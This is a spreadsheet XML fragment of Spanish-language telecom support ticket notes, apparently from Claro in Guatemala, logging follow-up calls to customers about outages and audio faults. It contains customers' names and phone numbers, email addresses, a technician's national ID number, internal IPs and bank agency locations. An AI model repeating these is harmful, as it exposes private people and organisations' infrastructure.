-ID 2001876483</t>
  </si>
  <si>
    <t>F4566086</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE MARIBEL MARTÍNEZ 77404115 Y 22424862 PARA VALIDAR LAS PRUEBAS REALIZADAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE MARIBEL MARTÍNEZ 77404115 PARA VALIDAR AFECTACION EN EL SERVICIO, PERO NO SE TIENE RESPUESTA
SE SEGUIRA INTENTANDO NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE SIGUE SIN CONTESTAR, FAVOR CC SV VALIDAR CON CLIENTE EL SERVICIO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE MARIBEL MARTÍNEZ 77404115  PARA VALIDAR EL SERVICIO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE NO NOS CONTESTA, NOS ENVIA A BUZON DIRECTO, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE MARIBEL MARTÍNEZ 77404115 PARA VALIDAR SI AUN PRESENTEO LA AFECTACION, PERO CLIENTE NO NOS CONTESTA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4566088</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EMILIO OCONOR  76540502 - 57788592 SE BRINDA RETROALIMENTACION A CLIENTE **
ID 2001907198 - 2001907662
**</t>
  </si>
  <si>
    <t>F4566094</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDUARDO QUINTANA 76006335 MENCIONA QUE YA TIENE RESPUESTA, REALIZA PRUEBAS EN LINEA Y CONFIRMA EL FUNCIONAMIENTO
-ID 2001869505</t>
  </si>
  <si>
    <t>F4566099</t>
  </si>
  <si>
    <t>SE TRATA DE LLAMAR A CLIENTE YESICA Y ALFREDO, PERO NO SE LOGRA COMUNICACION
2001949394
COLA:
NOMBRE: A: 0050433204297
NÚMERO: 0050433204297
DURACIÓN: 0:00:38
ESTADO: CONECTADA
DETALLES: 0050433204297
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 17/05/2022 13:43:15
2001949626
COLA:
NOMBRE: A: 0050487743905
NÚMERO: 0050487743905
DURACIÓN: 0:00:36
ESTADO: CONECTADA
DETALLES: 0050487743905
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 17/05/2022 13:44:04</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YESSICA AGUILAR 33204297 MENCIONA QUE AUN SE ENCUENTRA PERSONAL TECNICO EN SITIO PORQUE TENIAN  SERVICIO PERO NO SALIDA A INTERNET, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001985013</t>
  </si>
  <si>
    <t>F4566111</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERICK ARGUETA 56260499 MENCIONA QUE CONTINUAN CON LAS PRUEBAS POR LO QUE SOLICITA LLAMADA PARA LAS 16:00 HRS
-ID 2001966345</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERICK ARGUETA 56260499 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001932060</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERICK ARGUETA 56260499  NO RESPONDE, SE INTENTARA LUEGO
-ID 2001998277</t>
  </si>
  <si>
    <t>**SE LE LLAMA A CLIENTE ERICK ARGUETA AL 56260499 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 2001929761
**</t>
  </si>
  <si>
    <t>F4566112</t>
  </si>
  <si>
    <t>QUEDA PENDIENTE CLIENTE PARA LAS 13:30 HORAS</t>
  </si>
  <si>
    <t>F4566115</t>
  </si>
  <si>
    <t>SE NOTIFICA A CLIENTE ALARMA EN EL MONITOREO PROACTIVO, PRINCIPAL Y REDUNDANTE DOWN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66115
ID: 47501637T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATMATM1991
UBICADO EN: CAJERO 1991 SUPER 2 ESCUINTLA 2 CANTON PUENTE DE PALO LOTE 9 KM.60.42 CARR ESCUINTLA PU
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4566118</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN 23190600, ATIENDE HÉCTOR CAMPOS (PROVEEDOR) INDICA QUE AYER EN LA TARDE Y HOY POR LA MAÑANA TUVIERON PROBLEMAS DE AUDIO, ESTA REALIZANDO PRUEBAS DE LLAMADAS Y SOLICITA QUE SE LE CONTACTE A LAS 14:00 HORAS</t>
  </si>
  <si>
    <t>F4566120</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIEL TAROT 55194520 NO RESPONDE, NUMERO DESCONECTADO SE INTENTARA LUEGO**
-ID 3001070645
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL TAROT 55194520 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001021674</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIEL TAROT 55194520 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO**
-ID 3001100556
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIEL TAROT 55194520 SIGUE SIN RESPONDER , ENVIA A BUZON SE INTENTARA LUEGO**
ID 3001113147
**</t>
  </si>
  <si>
    <t>F4566143</t>
  </si>
  <si>
    <t>TEC FRANCISCO  58260592 INDICA QUE REALIZO PRUEBAS CON KATI RIVERA 53753354 QUIEN ESCALARA CON SU PROVEEDOR. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE KATI RIVERA 53753354, INDICA QUE EL EQUIPO ASMI54 SE ENCUENTRA SINCRONIZADO, SE LE SOLICITA SU APOYO PARA UBICAR Y REINICIAR SU PLANTA PBX, DEJA EN ESPERA EN LO QUE LO UBICA</t>
  </si>
  <si>
    <t>CLIENTE KATI RIVERA 53753354, UBICA PLANTA PBX NEC LO REINICIA PERO INCONVENIENTE PERSISTE, SE LE SOLICITA REINICIAR ASMI54L PERO CONTINÚA E1 CAIDO, SE LE CONSULTA AL CLIENTE POR SUS CREDENCIALES, CLIENTE INDICA QUE VA A BUSCAR LOS DATOS, SOLICITA SE LE LLAME EN 20 MINUTOS.
RESULTADO: LLAMADA HECHA
NOMBRE: 53753354
NÚMERO: 53753354
INICIO: HOY, 12:04 P. M.
FIN: HOY, 12:27 P. M.
DURACIÓN: 22:35
ID DE LLAMADA: 2001914173</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE KATI RIVERA 53753354, INDICA QUE SÍ TIENE SUS CREDENCIALES, SOLICITA SE PUEDA COORDINAR LA VISITA TÉCNICA, ATIENDEN HASTA LAS 5 PM</t>
  </si>
  <si>
    <t>F4566146</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANA DIAZ 70518343 PARA SOLICITAR DATOS DE VISITA
-ID 2001906092
NOMBRE DEL CLIENTE: ALCALDIA MPAL GUAZAPA
UBICACIÓN: AVENIDA 14 DE DICIEMBRE BARRIO EL CENTRO FRENTE AL PARQUE DE GUAZAPA
CONTACTO EN SITIO: ANA DIAZ - 70518343
HORARIO DE ATENCION: 8:00 - 12:00 Y 13:30 - 16:30
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4566149</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS LOPEZ 25069510 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001967558</t>
  </si>
  <si>
    <t>F4566153</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE EL SERVICIO YA NO PRESENTO PROBLEMAS, SOLICITA QUE SE MANTENGA EN MONITOREO Y SE VALIDE A LAS 16:00 HRS
SE CAMBIA DE ETAPA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE OMAR ROMERO 78536075 22416287 PARA VALIDAR SI AUN PERSISTE EL PROBLEMA DE CORTES
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4566167</t>
  </si>
  <si>
    <t>SE LE LLAMA A AMERICA PEREZ 58726497 ID: 2001915622
CONFIRMA SERVICIO OK UNICAMENTE QUE ES INESTABLE PERO CL COMENTA QUE TAMBIEN ES LENTO, EN LLAMADA CLIENTE CONFIRMA QUE EL WIFI UNICAMENTE ESTA LENTO E INESTABLE Y QUE NO TIENE DESEOS DE CONFIRMAR CONECTANDOSE DIRECTO AL CPE, SE V4RIFICA PROYECTO 5024665 Y CLARO NO ADMINISTRA EL WIFI, CL DEBE DE REVISARLO CON SU IT PERO CL MOLESTA CORTA LLAMADA, SE NOTIFICA A WAGNER.POLANCO VIA SKYPE PARA EL CIERRE DE INCIDENTE YA QUE NO ES FALLA DE INTERNET SINO DE WIFI DEL CLIENTE SEGUNCONFIRMACION DE SEÑORA AMERICA  | WIP</t>
  </si>
  <si>
    <t>F4566179</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE HUEZO 77517676 MENCIONA QUE AUN NO TIENE RESPUESTA POR PARTE DEL PROVEEDOR POR LO QUE SOLICITA LLAMADA A LAS 15:00 HRS
-ID 3001110695</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE JOSE HUEZO 77517676 INDICA QUE YA ESCALO EL CASO CON SU PROVEEDOR, COMENTA QUE POR LA TARDE TUVO CORTES DE LLAMADAS, PERO EL SERVICIO YA NORMALIZO Y SOLICITA QUE SE LE CONTACTE MAÑANA A LAS 8:00 AM</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE HUEZO 77517676 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001218522</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE HUEZO 77517676 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001081486 - 3001081791</t>
  </si>
  <si>
    <t>F4566183</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 17 DE MAYO DE 2022 12:28
PARA: LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;; ADMIN@INSIVUMEH.GOB.GT &lt;ADMIN@INSIVUMEH.GOB.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: REPORTE SATURACIÓN || 493500001T || INSIVUMEH
*-*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4566185</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENE VINICIO HERNANDEZ AL 42112328 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
ID 2001934846
**</t>
  </si>
  <si>
    <t>CLIENTE UBICA EQUIPO ETX-1 EL CUAL NO SE ENCUENTRA ALARMADO, SE LE SOLICITA REINICIARLO PERO CONTINÍA IGUAL</t>
  </si>
  <si>
    <t>F4566191</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE ROXANA MENA 75826853 / 61874035 QUIEN COMENTA QUE HA PRESENTADO CORTES DE LLAMADAS Y CRUCE DE AUDIO EN LLAMADAS ENLAZADAS, SIN EMBARGO NO SE OBSERVA INCONVENIENTES A NIVEL DE CLARO, SE LE INDICA AL CLIENTE QUE SE APLICO REINICIO DEL PUERTO DE MSAN PARA VALIDAR SI CON ESO RESTABLECE, CLIENTE INDICA QUE ESTARA REALIZANDO PRUEBAS, SOLICITA LLAMADA A LAS 12:30 HRS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4566203</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO AL 41093330 CONTESTA EL SEÑOR  ANGEL INDICA QUE EL SERVICIO ESTA ESTABLE Y OPERATIVO **
ID 3001115911
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
RE: FALLA ENLACE INTERNET C657_38300523</t>
  </si>
  <si>
    <t>SE LLAMA A A CLIENTE NUEVAMENTE SIN EMBARGO NO RESPONDE---41093330</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 41093330 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001924458</t>
  </si>
  <si>
    <t>SE LLAMA A ENCARGADO PARA VALIDAR MARCA DE EQUIPOS QUE DISTRIBUYEN A NIVEL WIFI SIN EMBARGO NO RESPONDE--</t>
  </si>
  <si>
    <t>SE VERIFICA BANDEJA NO SE CUENTA CON RESPUESTA DE CLIENTE</t>
  </si>
  <si>
    <t>F4566207</t>
  </si>
  <si>
    <t>INFORMA CLIENTE IRIS MONTES 78865035 QUE ESTÁ PRESENTANDO PERDIDA DE AUDIO EN LLAMADAS SALIENTES HACIA NÚMEROS FIJOS. SE LE COMENTA QUE SE ESTÁ VERIFICANDO EL INCONVENIENTE Y SE LE DEVOLVERÁ LA LLAMADAS. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4566213</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PSERONS TÉCNICO QUE SE PRESENTARA EN EL SITIO // QUEDAMOS A  LA ESPERA DE LA RESPUESTA POR PARTE DE CLIENTE
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 17 DE MAYO DE 2022 13:12
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; DENIS SICA &lt;DSICA@GTC.COM.GT&gt;
CC: INCIDENTES INFRAESTRUCTURA &lt;IPINFRA@GTC.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAIDO ID 7800096 AG068 JOYABAJ
BUEN DÍA ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN EL SITIO.
DIRECCIÓN:  BARRIO CENTRAL FRENTE AL PARQUE JOYABAJ QUICHE AGENCIA 68
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS.
LUIS DARIO VELASQUEEZ     IBM   750326     DPI  3260970231401
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>F4566214</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTHIAN MORALES AL 24210880 EXT 129 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001918356
**</t>
  </si>
  <si>
    <t>F4566222</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5299 CONTESTA EL SEÑOR RAUL INDICA QUE TRANSFERIRA LLAMADA CON LESLY QUIEN INDICA QUE  SE PRESENTO UNA CAIDA A LAS 16:36 SOLICITA SE VERIFIQUE || SE NOTIFICA A GESTOR **
ID 2001993027
**</t>
  </si>
  <si>
    <t>F4566227</t>
  </si>
  <si>
    <t>CLIENTE SR. ELIAZAR 58623264 ENCONTRO LOS EQUIPOS DE UM.</t>
  </si>
  <si>
    <t>***SE LLAMA A CLIENTE  AL PR  22515467 PERO NO RESPONDE , SE INTENTARA LUEGO **
ID 2001920458
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 41884412 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001933654</t>
  </si>
  <si>
    <t>SR. ELIAZAR 58623264 APLICA VALIDA QUE EL EQUIPO CTC UNION ESTA ENCENDIDO APLICO REINICIO PERO ENLACE NO LEVANTO. SE PROCEDE A SOLICITAR APOYO DE PERSONAL TECNICO.</t>
  </si>
  <si>
    <t>F4566233</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS CHIN AL 43246230 INDICA QUE PERSIVE PERDIDA DE PAQUETES QUE NO TIENE MONITOREO DE TRAFICO DEL RTG || SE NOTIFICA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 2001920955
**</t>
  </si>
  <si>
    <t>F4566237</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  RUBI CHAVARRIA 30130082 MENCIONA QUE TODO ESTA FUNCIONANDO BIEN
-ID 3001013508</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A CARLOS ZAMORA/CLIENTE CENTRAL INDICA QUE PERSISTE LO REPORTADO; SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, VÍA TELEFÓNICA GESTOR ASIGNADO CON FALLAS EN AUDIO; SE LE INDICA A CLIENTE QUE GESTOR LE DEVOLVERÁ LLAMADA EN 5/10 MINUTOS, CLIENTE DE ACUERDO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS ZAMORA 57247219 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001014298</t>
  </si>
  <si>
    <t>F4566240</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LESLY 40134701 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001976541</t>
  </si>
  <si>
    <t>SE VALIDA QUE CLIENTE INDICA QUE HA TENIDO INCONVENIENTES CON EL INTERNET. SE LOGRA LOCALIZAR EL 559800001T PARA EL MISMO PERO INDICA QUE SE QUEDE TT ABIERTO YA QUE DESDE LAS 15:00 HRS  NO HA PRESENTADO MAS CAIDAS.</t>
  </si>
  <si>
    <t>F4566242</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE BRANDON ORDOÑEZ 31259679 PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE BRANDON ORDOÑEZ 31259679 PARA VALIDAR SI YA TIENEN ACCESO A LA OFICINA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE NO TIENE ACCESO YA QUE EL PERSONAL IT SE ENCUENTRA EN REUNION Y ELLOS SON LOS UNICOS QUE TIENEN ACCESO, SE LE CONSULTA AL CLIENTE CUANDO FINALIZARA LA REUNION SIN EMBARGO NOS COMENTA QUE NO TIENE CONOCIMIENTO DE LA HORA, POR LO QUE SOLICITA QUE SE LE ENVIE PERSONAL TECNICO PARA REALIZAR PRUEBAS EN CONJUNTO CON ALGUNO DE LOS TECNICOS CUANDO SALGAN, SIN EMBARGO CLIENTE INDICA QUE A LAS 13:00 HRS  LA MAYORIA SALE A ALMORZAR PERO ESTARA SOLICITANDO A ALGUIEN QUE SE QUEDE PARA APOYAR A LOS TECNICOS, INDICA QUE NO ES NECESARIO TRAMITAR PERMISOS UNICAMENTE QUE SE LE ENVIE EL NOMBRE VIA CORREO OSCAR.SUNUM@CAMINOS.GOB.GT DE LA PERSONA QUE LLEGARA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE TIENEN QUE UBICAR EL ACCESO A LA OFICINA DONDE ESTAN LOS EQUIPOS, SOLICITA QUE SE LE CONTACTE EN 15 MIN
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4566243</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BARBARA REYES 41517131  MENCIONA QUE NO HA PRESENTADO NINGUN PROBLEMA PERO SOLICITA LLAMADA PARA LAS 16:30 CONFIRMAR EL FUNCIONAMIENTO
-ID 2001055815</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BARBARA REYES 41517131 MENCIONA QUE NO PUEDE ATENDER POR LO QUE SOLICITA LLAMADA PARA MAÑANA EN LA MAÑANA ( NO BRINDA HORARIO)
-ID 2001218615</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BARBARA REYES 41517131 QUEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001282007</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN 22183333, ATIENDE MARITZA INFORMA QUE EL DÍA DE HOY SOLO TUVO PROBLEMAS CON 1 LLAMADA, TODAS LAS DEMÁS LLAMADAS COMPLETARON CORRECTAMENTE, SIGUE REALIZANDO PRUEBAS
3001961871
COLA:
NOMBRE: A: 22183333
NÚMERO: 22183333
ESTADO: CONECTADA
DURACIÓN: 0:01:26
DETALLES: 22183333
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 19/05/2022 14:16:01</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE BARBARA REYES 41517131 SE LE INFORMA QUE SE REALIZO UN CAMBIO A NIVEL DE CLARO, PERO EN ESTE MOMENTO YA SE ESTA RETIRANDO Y SOLICITA LLAMADA EL DÍA DE MAÑANA A LAS 10:00 AM
3001017302
COLA:
NOMBRE: A: 41517131
NÚMERO: 41517131
ESTADO: CONECTADA
DURACIÓN: 0:02:10
DETALLES: 41517131
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 17/05/2022 17:11:17</t>
  </si>
  <si>
    <t>SE LLLAMA A LCIENTE BARBARA REYES 41517131   --- INDICA QUE HOY NO TUVO INCONVENIENTES Y QUE SE VALIDE EL DIA DE MAÑANA PARA CONFIRMAR QUE ESTE TODO OK- PIDE VALIDAR 10 AM ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE BARBARA REYES 41517131 INDICA QUE ESTA REALIZANDO PRUEBAS DE LLAMADAS, SOLICITA LLAMADA AL FINAL DE LA TARDE</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE BARBARA REYES 41517131 INDICA QUE ESTA REALIZANDO PRUEBAS DE LLAMADAS Y SOLICITA QUE SE LE CONTACTE A LAS 16:00 HORAS
3001168352
COLA:
NOMBRE: A: 41517131
NÚMERO: 41517131
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DURACIÓN: 0:00:54
DETALLES: 41517131
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 18/05/2022 12:46:17</t>
  </si>
  <si>
    <t xml:space="preserve"> 18/05/2022 12:46:27 GUATEMALA/CENTRO AMERICA (JOSE ANGEL GODINEZ OVALLE):
SE LLAMA AL CLIENTE BARBARA REYES 41517131 INDICA QUE ESTA REALIZANDO PRUEBAS DE LLAMADAS Y SOLICITA QUE SE LE CONTACTE A LAS 16:00 HORAS
3001168352</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE BARBARA REYES 41517131 INFORMA QUE POR EL MOMENTO EL SERVICIO ESTA FUNCIONANDO CORRECTAMENTE, PERO ESTA REALIZANDO PRUEBAS Y SOLICITA LLAMADA EL DÍA DE MAÑANA A LAS 16:00 HORAS
3001236059
COLA:
NOMBRE: A: 41517131
NÚMERO: 011 50241517131
ESTADO: CONECTADA
DURACIÓN: 0:00:51
DETALLES: +50241517131
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 18/05/2022 15:50:15</t>
  </si>
  <si>
    <t>F4566246</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PABLO MOÑUZ AL  56327392 SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR **
ID 2001926110
**</t>
  </si>
  <si>
    <t>F4566249</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DEL CLIENTE, CON LA AUTORIZACION DE PERMISOS DE PERSONAL TECNICO, SE APERTURA FALLA,
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 21 DE MAYO DE 2022 8:18
PARA: TIC ORELLANA, FRANKLIN &lt;FRANKLIN.ORELLANA@BANRURAL.COM.GT&gt;; JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;; TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; MONITOREO.ENLACES@BANRURAL.COM.GT &lt;MONITOREO.ENLACES@BANRURAL.COM.GT&gt;; AGE073@MAILPRIVADO.BDR &lt;AGE073@MAILPRIVADO.BDR&gt;; AGE073.SUBGERENTE - AGUACATAN &lt;AGE073.SUBGERENTE@MAILPRIVADO.BDR&gt;
ASUNTO: RE: 8900477T || "CC_BANRURAL_GT_AGENCIA_0073"
BUEN DÍA
ESTIMADO CLIENTE, DANDO SEGUIMIENTO AL INCIDENTE, ESTAREMOS COORDINADO CON PERSONAL TÉCNICO, LE AGRADECEMOS EL APOYO BRINDANDO.
SALUDOS CORDIALES.
DE: TIC ORELLANA, FRANKLIN &lt;FRANKLIN.ORELLANA@BANRURAL.COM.GT&gt;
ENVIADO: SÁBADO, 21 DE MAYO DE 2022 8:13
PARA: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;; TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; MONITOREO.ENLACES@BANRURAL.COM.GT &lt;MONITOREO.ENLACES@BANRURAL.COM.GT&gt;; AGE073@MAILPRIVADO.BDR &lt;AGE073@MAILPRIVADO.BDR&gt;; AGE073.SUBGERENTE - AGUACATAN &lt;AGE073.SUBGERENTE@MAILPRIVADO.BDR&gt;
ASUNTO: RE: 8900477T || "CC_BANRURAL_GT_AGENCIA_0073"
BUEN DÍA ESTIMADOS CLARO, FAVOR PROCEDER CON LA VISITA PROGRAMADA AGRADECERÉ CONSIDERAR QUE LA AGENCIA HOY LABORA HASTA LAS 12:00 HORAS.
ESTIMADO GERENTE DE @AGE073 - AGUACATAN, SOLICITO SU COLABORACIÓN PERMITIENDO EL INGRESO  DEL PERSONAL DESCRITO EN EL PRESENTE CORREO, EL ESTARÁ VALIDANDO EL ENLACE DEL PROVEEDOR CLARO.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A GERENTE JOSE MENDOZA QUIEN INDICA QUE EN ESTOS MOMENTOS SE ENCUENTRA APOYANDO CON PRUEBAS A ATM, POR LO QUE SOLICITA QUE SE LLAMEN EN MEDIA HORA
1001114701
COLA:
NOMBRE: A: 45338704
NÚMERO: 45338704
DURACIÓN: 0:02:12
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 45338704
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 20/05/2022 09:29:38</t>
  </si>
  <si>
    <t>SE LLAMA PERSONAL DE LA AGENCIA APOYA REVISANDO CONEXIONES, SE REVISA EQUIPO AETRA Y CPE SE APLICAN REINICIO SIN EMBARGO ENLACE NO RESTABLECIO, SE ADJUNTA LOG VIA CIC.
1001269655
COLA:
NOMBRE: A: 52095097
NÚMERO: 52095097
DURACIÓN: 0:19:29
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 52095097
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 20/05/2022 17:08:51</t>
  </si>
  <si>
    <t>F4566257</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JOSUE CEBALLOS 94835818  SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001960539</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. BAYRON SALGADO 32675009 NO CONESTO IVR ENVIA A BUZON, ES NECESARIO INFORMAR QUE CONECTE CORRECTAMENTE EL ROUTER AL IMC, ID: 2001914502.</t>
  </si>
  <si>
    <t>CLIENTE CONECTO UN ROUTER NUEVO DE MARCA RADIO SHACK PERO EL PUERTO WAN NO ENCIENDE SOLO SUS PUERTOS LAN, CONECTA SU ROURTER ANTIGUO DE MARCA TENDA CON EL CUAL SE ASOCIO SU RED LAN, REALZARON PRUEBAS CONFIRMA QUE YA TIENE CONEXION A SUS SISTEMA. CONFIRMA Y VALIDA ENLACE OPERATIVO Y ESTANBLE, ID: 2001964091.
1539667_CSC867_DA-GAS-COMAYAGUA_COM01_DT10MB#SH ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.1.235.177            0   183D.5E29.6845  ARPA   GIGABITETHERNET2.3000
INTERNET  10.1.235.178            -   0045.1DBB.30C5  ARPA   GIGABITETHERNET2.3000
INTERNET  10.10.15.1              -   0045.1DBB.30C0  ARPA   VLAN2
